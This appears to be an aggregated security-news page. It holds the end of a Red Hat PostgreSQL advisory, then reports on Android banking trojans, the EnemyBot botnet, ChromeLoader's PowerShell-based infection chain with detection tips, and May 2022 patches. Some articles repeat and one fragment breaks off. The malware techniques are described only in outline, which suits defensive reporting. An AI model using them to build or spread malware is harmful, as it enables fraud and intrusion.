* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.src.rpm

aarch64:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.aarch64.rpm

ppc64le:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.ppc64le.rpm

s390x:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.s390x.rpm

x86_64:  
postgresql-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-contrib-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-debugsource-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-docs-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plperl-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plpython3-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-pltcl-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-devel-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-static-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-test-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.6.0+15342+53518fac.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpTSG9zjgjWX9erEAQh5rQ//fajwjW7BF4vU5SLXYP1LCrXvAs4jldYq  
PUdKxn8jfJy7yy2ZjSeuR9exa0dheBsPkHPB54oVCe/eKrv5tF0rYGkGPWmI3s0K  
uMXfJqkFJRkwDSR0WDhzB8uINPZKZ3YCrPgvH3ZfkX987nIHW6OboaBurO9gjrw+  
aJmo64eYIlxhqkocw8MlQYVyuaYmzCvbReulWKOO7ecYOMy0D2miPq06lbbn99K9  
fGN3yCDYsZIobnyr8mL2JW6WBUEAIF38xFf950ofbYzJwJhNwzQYJ+8iH4DphDub  
4IcnMN+JSn919mgf5OdAHxEo1nT1D1dl2ziWpJssnQQf96W5GIGEHXWexZKI2mv5  
rFdb7kfEDPNYxRo/3QRmF6rowaXC2ZuWFmc2nnCzvOlqUv2gKkXHkk7Q4fvqzRYJ  
0lxh5ONbOxw/JehQ061VItwOlq8CeObmbX1e+DvT/oAIqECr4NN+iDpKIbr65h+y  
WrCSQ1wtlWegIk8Iryx7I8UgLBQHcYKj4ZZjGenT1ksb3TUU3er3AoPpKkGcl+Eu  
3m9/4RhR9EMRKX8glHLNi3aukrmUsZxn3dzAQDvd2xqQ9k2948P2diolFCdKbIA3  
lBF/6sVXmBzIMJzsxNmrXjR5tvjaDZgRoDB/g7K+TIoHcVSt3ozDs8zCxmN/c/K5  
QkUJp119LnM=  
=P2WI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4805-01

An analysis of the mobile threat landscape in 2022 shows that Spain and Turkey are the most targeted countries for malware campaigns, even as a mix of new and existing banking trojans are increasingly targeting Android devices to conduct on-device fraud (ODF).
Other frequently targeted countries include Poland, Australia, the U.S., Germany, the U.K., Italy, France, and Portugal.
"The most

An analysis of the mobile threat landscape in 2022 shows that Spain and Turkey are the most targeted countries for malware campaigns, even as a mix of new and existing banking trojans are increasingly targeting Android devices to conduct on-device fraud (ODF).

Other frequently targeted countries include Poland, Australia, the U.S., Germany, the U.K., Italy, France, and Portugal.

"The most worrying leitmotif is the increasing attention to On-Device Fraud (ODF)," Dutch cybersecurity company ThreatFabric said in a report shared with The Hacker News.

"Just in the first five months of 2022 there has been an increase of more than 40% in malware families that abuse Android OS to perform fraud using the device itself, making it almost impossible to detect them using traditional fraud scoring engines."

Hydra, FluBot (aka Cabassous), Cerberus, Octo, and ERMAC accounted for the most active banking trojans based on the number of samples observed during the same period.

Accompanying this trend is the continued discovery of new dropper apps on Google Play Store that come under the guise of seemingly innocuous productivity and utility applications to distribute the malware -

*   Nano Cleaner (com.casualplay.leadbro)
*   QuickScan (com.zynksoftware.docuscanapp)
*   Chrome (com.talkleadihr)
*   Play Store (com.girltold85)
*   Pocket Screencaster (com.cutthousandjs)
*   Chrome (com.biyitunixiko.populolo)
*   Chrome (Mobile com.xifoforezuma.kebo)
*   BAWAG PSK Security (com.qjlpfydjb.bpycogkzm)

What's more, on-device fraud — which refers to a stealthy method of initiating rogue transactions from victim's devices — has made it feasible to use previously stolen credentials to login to banking applications and carry out financial transactions.

To make matters worse, the banking trojans have also been observed constantly updating their capabilities, with Octo devising an improved method to steal credentials from overlay screens even before they are submitted.

"This is done in order to be able to get the credentials even if \[the\] victim suspected something and closed the overlay without actually pressing the fake 'login' present in the overlay page," the researchers explained.

ERMAC, which emerged last September, has received noticeable upgrades of its own that allow it to siphon seed phrases from different cryptocurrency wallet apps in an automated fashion by taking advantage of Android's Accessibility Service.

Accessibility Service has been Android's Achilles' heel in recent years, allowing threat actors to leverage the legitimate API to serve unsuspecting users with fake overlay screens and capture sensitive information.

Last year, Google attempted to tackle the problem by ensuring that "only services that are designed to help people with disabilities access their device or otherwise overcome challenges stemming from their disabilities are eligible to declare that they are accessibility tools."

But the tech giant is going a step further in Android 13, which is currently in beta, by restricting API access for apps that the user has sideloaded from outside of an app store, effectively making it harder for potentially harmful apps to misuse the service.

That said, ThreatFabric noted it was able to bypass these restrictions trivially by means of a tweaked installation process, suggesting the need for a more stricter approach to counteract such threats.

It's recommended that users stick to downloading apps from the Google Play Store, avoid granting unusual permissions to apps that have no purpose asking for them (e.g., a calculator app asking to access contact lists), and watch out for any phishing attempts aimed at installing rogue apps.

"The openness of Android OS serves both good and bad as malware continues to abuse the legitimate features, whilst upcoming restrictions seem to hardly interfere with the malicious intentions of such apps," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Latest Mobile Malware Report Suggests On-Device Fraud is on the Rise

Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.

Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.

A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.

“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” reported AT&T Alien labs in a recent post. “The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” they added.

 According to AT&T’s analysis of the malware‘s code base, EnemyBot borrows generously from code used by other botnets such as Mirai, Qbot and Zbot. The Keksec group distributes the malware by targeting Linux machines and IoT devices, this threat group was formed back in 2016 and includes several botnet actors.

****EnemyBot Working****

The Alien lab research team study found four main sections of the malware.

The first section is a python script ‘cc7.py’, used to download all dependencies and compile the malware into different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file “update.sh” is created and used to spread the malware to vulnerable targets.

The second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source codes of the various botnets that can combine to perform an attack.

The third module is obfuscation segment “hide.c” and is compiled and executed manually to encode /decode the malware strings. A simple swap table is used to hide strings and “each char is replaced with a corresponding char in the table” according to researchers.

The last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.

AT&T researcher’s further analysis revealed a new scanner function to hunt vulnerable IP addresses and an “adb\_infect” function that is used to attack Android devices.

ADB or Android Debug Bridge is a command-line tool that allows you to communicate with a device.

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,” said the researcher.

“Keksec’s EnemyBot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,” the researchers added.

This Linux-based botnet EnemyBot was first discovered by Securonix in March 2022, and later in-depth analysis was done by Fortinet.

****Vulnerabilities Currently Exploited by EnemyBot****

The AT&T researchers release a list of vulnerabilities that are currently exploited by the Enemybot, some of them are not assigned a CVE yet.

The list includes Log4shell vulnerability (CVE-2021-44228, CVE-2021-45046), F5 BIG IP devices (CVE-2022-1388), and others. Some of the vulnerabilities were not assigned a CVE yet such as PHP Scriptcase and Adobe ColdFusion 11.

*   Log4shell vulnerability – CVE-2021-44228, CVE-2021-45046
*   F5 BIG IP devices – CVE-2022-1388
*   Spring Cloud Gateway – CVE-2022-22947
*   TOTOLink A3000RU wireless router – CVE-2022-25075
*   Kramer VIAWare – CVE-2021-35064

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,” the researcher explained.

****Recommended Actions** **

The Alien lab researcher suggests methods to protect from the exploitation. Users are advised to use a properly configured firewall and focus on reducing Linux server and IOT devices’ exposure to the internet.

Another action recommended is to monitor the network traffic, scan the outbound ports and look for the suspicious bandwidth usage. Software should be updated automatically and patched with the latest security update.

EnemyBot Malware Targets Web Servers, CMS Tools and Android OS

The malvertiser’s use of PowerShell could push it beyond its basic capabilities to spread ransomware, spyware or steal data from browser sessions, researchers warn.

The malvertiser’s use of PowerShell could push it beyond its basic capabilities to spread ransomware, spyware or steal data from browser sessions, researchers warn.

ChromeLoader may seem on the surface like a run-of-the-mill browser hijacker that merely redirects victims to advertisement websites. However, its use of PowerShell could pose a greater risk by leading to further and advanced malicious activity, such as the propagation of ransomware or spyware or theft of browser-session data.

Researchers are warning of the potential for ChromeLoader—which has seen a resurgence in activity recently—to pose a more sophisticated threat than typical malvertisers do, according to two separate blog posts by Malwarebytes Labs and Red Canary.

ChromeLoader is a pervasive and persistent browser hijacker that eventually manifests as a browser extension, modifying victims’ Chrome settings and redirecting user traffic to advertisement websites. On Windows machines, victims become infected with the malware through ISO files that poses as a cracked video game or pirated films or TV programs, researchers said.

 However, ChromeLoader is platform agnostic, which means users of macOS also are at risk from infection, according to a blog post from Malwarebytes Lead Malware Intelligence Analyst Christopher Boyd. However, instead of lurking in ISO files, attackers use DMG (Apple Disk Image) files, a more common macOS format, to hide ChromeLoader, he said.

While its core functionality is fairly benign, ChromeLoader has a unique feature in that it uses PowerShell to inject itself into the browser and add a malicious extension to it—”a technique we don’t see very often (and one that often goes undetected by other security tools),” warned Aedan Russell from Red Canary’s Detection Engineering team in a blog post.

“If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser sessions,” he wrote.

****The Infection Process****

ChromeLoader lurks in bogus files that are promoted on Twitter and through other services, or found on rogue and torrent sites offering pirated video games and other media for free download, researchers said.

“Some social media posts promote supposedly cracked Android games via QR codes which direct would-be gamers to rogue websites,” Boyd explained.

Double clicking the ISO file mounts it as a virtual CD-ROM, with the ISO’s executable claiming to be the content that the victim originally was looking for, he wrote.

“Within this ISO is an executable used to install ChromeLoader, along with what appears to be a .NET wrapper for the Windows Task Scheduler,” according to Red Canary’s Russell. “This is how ChromeLoader maintains its persistence on the victim’s machine later in the intrusion chain.”

Once installed, ChromeLoader uses a PowerShell command to load in a Chrome extension from a remote resource. PowerShell then removes the scheduled task so the victim has no idea that their browser has been compromised, Boyd said.

“At this point, search results cannot be trusted and bogus entries will be displayed to the user,” he wrote.

ChromeLoader uses the same bait—pirated videos or cracked games—to lure macOS users, but the infection process is a bit different, Russell explained. On macOS machines, ChromeLoader uses aDMG file that contains an installer script that can drop payloads for either Chrome or Safari instead of a portable executable file.

“When executed by the end user, the installer script then initiates cURL to retrieve a ZIP file containing the malicious browser extension and unzips it within the private/var/tmp directory, finally executing Chrome with command-line options to load the malicious extension,” he wrote.

****Mitigation and Detection****

Researchers offered mitigation advice as well as both user- and administrator-level ways to detect if a system has been infected with ChromeLoader.

One obvious tip is to avoid downloading pirated software or videos, which Boyd warned “is a very risky business,” not to mention illegal.

“If you’re downloading a torrent, you may well be rolling dice with regard to the digital health of your devices,” he wrote.

Users also can click on the “More” icon, then “More Tools -> Extensions” from the drop-down list in Chrome to see everything that’s installed, active or disabled, along with additional information about all extensions present. From there is anything looks dodgy, Google offers steps to reset browser settings or clean things up, he said.

Red Canary offered more advanced detection tactics based on ChromeLoader’s use of PowerShell to find out if a browser has been infected.

One is to search for PowerShell containing a shortened version of the encodedCommand flag in its command line, which can find the execution of encoded PowerShell commands. Another is to looks for instances of the Chrome browser executable spawning from PowerShell with a corresponding command line that includes appdata\\local as a parameter.

In macOS, security administrators can search forsh or bash scripts running in macOS environments with command lines associated with the macOS variant of ChromeLoader, as well as the execution of encoded sh, bash, or zsh commands on macOS endpoints to know if a browser has been infected.

ChromeLoader Browser Hijacker Provides Gateway to Bigger Threats

Plus: Google patches 36 Android vulnerabilities, Cisco fixes three high-severity issues, and VMWare closes two “serious” flaws.

May has been another busy month of security updates, with Google’s Chrome browser and Android operating system, Zoom, and Apple’s iOS releasing patches to fix serious vulnerabilities.

Meanwhile, things have not run smoothly for Microsoft, which was forced to issue an out-of-band update after a disastrous Patch Tuesday during the month. And Cisco, Nvidia, Zoom, and VMWare all issued patches for pressing flaws.

Here’s what you need to know.

Apple iOS and iPadOS 15.5, macOS Big Sur 11.6.6, tvOS 15.5, watchOS 8.6

With Apple due to announce iOS 16 at its Worldwide Developers Conference in June, the iPhone maker released probably its last major iOS 15-point update in May. It came with new features, but iOS and iPadOS 15.5 also fixed 34 security vulnerabilities, some of which are serious.

Security issues fixed in iOS 15.5 include flaws in the Kernel, as well as in the WebKit browser engine, according to Apple’s support page. Thankfully, none of the issued patches in iOS and iPad 15.5 are being used in attacks, according to the company, but that doesn’t mean they won’t be if you don’t update now.

Meanwhile, users of macOS, tvOS, and the Apple Watch should update their devices ASAP, as Apple also issued an emergency update to patch an issue it believes is already being used in attacks. The flaw in Apple AVD, labeled CVE-2022-22675, could allow an app to execute code with Kernel privileges. Issues in the Kernel are as bad as it gets, so it’s worth checking and updating your devices right away.

Microsoft’s Flubbed May Patch Tuesday

Microsoft’s May Patch Tuesday was something of a disaster for the diligent businesses that installed it straight away.

On May 10, the firm issued security updates to fix 75 vulnerabilities, eight labeled as serious and three that were being exploited by attackers. The issues fixed in May’s Patch Tuesday were important, but there were soon problems for some Microsoft users, who reported authentication failures after installing the latest updates. It impacted people using the client and server Windows platforms and systems running all Windows versions, including Windows 11 and Windows Server 2022.

In a bid to fix the problem, the firm was forced to issue an out-of-band update for Windows 10, Windows 11, and Windows Server 2008, 2012, 2016, 2019, and 2022 on May 20. The update won’t install automatically—you need to download it from Microsoft’s update catalog.

Firefox 100.0.2

In early May, Mozilla released Firefox 100, including nine security fixes for its Firefox browser, of which seven were rated as high severity. But later in May, ethical hackers at the Pwn20wn competition in Vancouver were able to demonstrate how attackers could execute JavaScript code on devices running the latest Mozilla software. Mozilla fixed the issues in another updateFirefox 100.0.2, Firefox ESR 91.9.1, Firefox for Android 100.3, and Thunderbird 91.9.1. Click those update buttons.

Android

May’s Android security update is a big one, patching 36 vulnerabilities, including an issue already being exploited by attackers. This exploited flaw is a privilege escalation bug in the Linux Kernel known as “The Dirty Pipe.”

The flaw, which impacts newer Android devices running Android 12 and later, was disclosed by Google in February, but it has taken a while to reach devices.

You Need to Update iOS, Chrome, Windows, and Zoom ASAP

May has been another busy month of security updates, with Google’s Chrome browser and Android operating system, Zoom, and Apple’s iOS releasing patches to fix serious vulnerabilities.

Meanwhile, things have not run smoothly for Microsoft, which was forced to issue an out-of-band update after a disastrous Patch Tuesday during the month. And Cisco, Nvidia, Zoom, and VMWare all issued patches for pressing flaws.

Here’s what you need to know.

Apple iOS and iPadOS 15.5, macOS Big Sur 11.6.6, tvOS 15.5, watchOS 8.6

With Apple due to announce iOS 16 at its Worldwide Developers Conference in June, the iPhone maker released probably its last major iOS 15 point update in May. It came with new features, but iOS and iPadOS 15.5 also fixed 34 security vulnerabilities, some of which are serious.

Security issues fixed in iOS 15.5 include flaws in the Kernel as well as in the WebKit browser engine, according to Apple’s support page. Thankfully, none of the issued patches in iOS and iPad 15.5 are being used in attacks, according to the company, but that doesn’t mean they won’t be if you don’t update now.

Meanwhile, users of macOS, tvOS, and the Apple Watch should update their devices ASAP, as Apple also issued an emergency update to patch an issue it believes is already being used in attacks. The flaw in Apple AVD, labeled CVE-2022-22675, could allow an app to execute code with Kernel privileges. Issues in the Kernel are as bad as it gets, so it’s worth checking and updating your devices right away.

Microsoft’s Flubbed May Patch Tuesday

Microsoft’s May Patch Tuesday was something of a disaster for the diligent businesses that installed it straight away.

On May 10, the firm issued security updates to fix 75 vulnerabilities, eight labeled as serious and three that were being exploited by attackers. The issues fixed in May’s Patch Tuesday were important, but there were soon problems for some Microsoft users, who reported authentication failures after installing the latest updates. It impacted people using the client and server Windows platforms and systems running all Windows versions, including Windows 11 and Windows Server 2022.

In a bid to fix the problem, the firm was forced to issue an out-of-band update for Windows 10, Windows 11, and Windows Server 2008, 2012, 2016, 2019, and 2022 on May 20. The update won’t install automatically—you need to download it from Microsoft's update catalog.

Firefox 100.0.2

In early May, Mozilla released Firefox 100, including nine security fixes for its Firefox browser, of which seven were rated as high severity. But later in May, ethical hackers at the Pwn20wn competition in Vancouver were able to demonstrate how attackers could execute JavaScript code on devices running the latest Mozilla software. Mozilla fixed the issues in another update, Firefox 100.0.2, Firefox ESR 91.9.1, Firefox for Android 100.3, and Thunderbird 91.9.1. Click those update buttons.

Android

May’s Android security update is a big one, patching 36 vulnerabilities including an issue already being exploited by attackers. The already exploited flaw is a privilege escalation bug in the Linux Kernel known as “The Dirty Pipe.”

The flaw, which impacts newer Android devices running Android 12 and later, was disclosed by Google in February, but it’s taken a while to reach devices.

Tag

#mac